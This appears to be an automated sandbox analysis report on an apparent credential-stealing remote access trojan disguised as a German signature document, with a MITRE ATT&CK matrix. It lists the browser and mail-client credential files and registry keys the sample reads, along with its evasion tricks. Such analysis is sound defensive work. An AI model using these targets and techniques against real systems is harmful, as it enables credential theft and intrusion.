          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeProcess created: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe /stext "C:\Users\user\AppData\Local\Temp\fdszcjcgmdhbszdagejyggbiyhyoajw"Jump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeProcess created: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe /stext "C:\Users\user\AppData\Local\Temp\pxxsdbnaalzgvfzeppwajtwrhnqxtundeo"Jump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: edgegdi.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: dwmapi.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: oleacc.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: shfolder.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: riched20.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: usp10.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: msls31.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: textinputframework.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: edgegdi.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: rstrtmgr.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: edgegdi.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: pstorec.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: vaultcli.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: edgegdi.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: pstorec.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: edgegdi.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeFile written: C:\Users\user\AppData\Local\Temp\tmc.iniJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeFile opened: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.cfgJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
          Source: Nutzen_Unterschrift_Planen#2024.com.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

          Data Obfuscation

          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeUnpacked PE file: 3.2.Nutzen_Unterschrift_Planen#2024.com.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeUnpacked PE file: 4.2.Nutzen_Unterschrift_Planen#2024.com.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeUnpacked PE file: 5.2.Nutzen_Unterschrift_Planen#2024.com.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
          Source: Yara matchFile source: 00000000.00000002.316846928075.0000000007E80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_10001B18
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 0_2_10002DE0 push eax; ret 0_2_10002E0E
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 2_2_36F72806 push ecx; ret 2_2_36F72819
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 3_2_0044693D push ecx; ret 3_2_0044694D
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 3_2_0044DB70 push eax; ret 3_2_0044DB84
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 3_2_0044DB70 push eax; ret 3_2_0044DBAC
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 3_2_00451D54 push eax; ret 3_2_00451D61
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 4_2_0044B090 push eax; ret 4_2_0044B0A4
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 4_2_0044B090 push eax; ret 4_2_0044B0CC
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 4_2_00451D34 push eax; ret 4_2_00451D41
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 4_2_00444E71 push ecx; ret 4_2_00444E81
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 5_2_00414060 push eax; ret 5_2_00414074
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 5_2_00414060 push eax; ret 5_2_0041409C
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 5_2_00414039 push ecx; ret 5_2_00414049
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 5_2_004164EB push 0000006Ah; retf 5_2_004165C4
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 5_2_00416553 push 0000006Ah; retf 5_2_004165C4
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 5_2_00416555 push 0000006Ah; retf 5_2_004165C4
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeFile created: C:\Users\user\AppData\Local\Temp\nsuC1C1.tmp\System.dllJump to dropped file
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 4_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,4_2_004047CB
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeAPI/Special instruction interceptor: Address: 885C3D2
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeAPI/Special instruction interceptor: Address: 577C3D2
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 3_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,3_2_0040DD85
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeWindow / User API: threadDelayed 3909Jump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeWindow / User API: threadDelayed 5790Jump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsuC1C1.tmp\System.dllJump to dropped file
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe TID: 7824Thread sleep count: 3909 > 30Jump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe TID: 2264Thread sleep time: -90000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe TID: 2264Thread sleep count: 5790 > 30Jump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe TID: 2264Thread sleep time: -17370000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeThread sleep count: Count: 3909 delay: -5Jump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 0_2_0040596D GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_0040596D
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 0_2_004065A2 FindFirstFileW,FindClose,0_2_004065A2
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 2_2_36F710F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,2_2_36F710F1
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 2_2_36F76580 FindFirstFileExA,2_2_36F76580
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 3_2_0040AE51 FindFirstFileW,FindNextFileW,3_2_0040AE51
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 4_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,4_2_00407EF8
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 5_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,5_2_00407898
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 3_2_00418981 memset,GetSystemInfo,3_2_00418981
          Source: Nutzen_Unterschrift_Planen#2024.com.exe, 00000002.00000002.321700699296.00000000060D7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeAPI call chain: ExitProcess graph end nodegraph_0-2235
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeAPI call chain: ExitProcess graph end nodegraph_0-2424
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeAPI call chain: ExitProcess graph end nodegraph_4-34117
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 2_2_36F72639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_36F72639
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_10001B18
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 2_2_36F74AB4 mov eax, dword ptr fs:[00000030h]2_2_36F74AB4
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 2_2_36F7724E GetProcessHeap,2_2_36F7724E
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 2_2_36F72B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_36F72B1C
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exeCode function: 2_2_36F760E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_36F760E2

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe Section loaded: NULL target: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe Section loaded: NULL target: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe Section loaded: NULL target: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe Process created: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe "C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe"
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe Process created: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe /stext "C:\Users\user\AppData\Local\Temp\ubmgcrsfyvpwitpwpupfvcprqao"
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe Process created: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe /stext "C:\Users\user\AppData\Local\Temp\fdszcjcgmdhbszdagejyggbiyhyoajw"
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe Process created: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe /stext "C:\Users\user\AppData\Local\Temp\pxxsdbnaalzgvfzeppwajtwrhnqxtundeo"
          Source: Nutzen_Unterschrift_Planen#2024.com.exe, 00000002.00000002.321700699296.00000000060D7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: |Program Manager|
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe Code function: 2_2_36F72933 cpuid 2_2_36F72933
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe Queries volume information: C:\ VolumeInformation
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe Code function: 2_2_36F72264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,2_2_36F72264
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe Code function: 4_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,4_2_004082CD
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe Code function: 0_2_00403350 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403350
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information

          Source: Yara match File source: 00000002.00000002.321700699296.00000000060D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000002.00000002.321700699296.00000000060FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: Process Memory Space: Nutzen_Unterschrift_Planen#2024.com.exe PID: 6512, type: MEMORYSTR
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\places.sqlite
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\key4.db
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe Key opened: HKEY_CURRENT_USER\Software\Paltalk
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe Code function: ESMTPPassword 4_2_004033F0
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword 4_2_00402DB3
          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword 4_2_00402DB3

          Remote Access Functionality

          Source: C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe Mutex created: \Sessions\1\BaseNamedObjects\Rmc-I617OK
          Source: Yara match File source: 00000002.00000002.321700699296.00000000060D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: 00000002.00000002.321700699296.00000000060FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match File source: Process Memory Space: Nutzen_Unterschrift_Planen#2024.com.exe PID: 6512, type: MEMORYSTR
          Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
          Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 11 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | 1 OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
          Credentials | Domains | Default Accounts | 2 Command and Scripting Interpreter | Boot or Logon Initialization Scripts | 1 Access Token Manipulation | 2 Obfuscated Files or Information | 2 Credentials in Registry | 1 Account Discovery | Remote Desktop Protocol | 1 Data from Local System | 2 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
          Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 112 Process Injection | 1 Software Packing | 1 Credentials In Files | 3 File and Directory Discovery | SMB/Windows Admin Shares | 1 Email Collection | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
          Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 DLL Side-Loading | NTDS | 128 System Information Discovery | Distributed Component Object Model | 2 Clipboard Data | 1 Remote Access Software | Traffic Duplication | Data Destruction
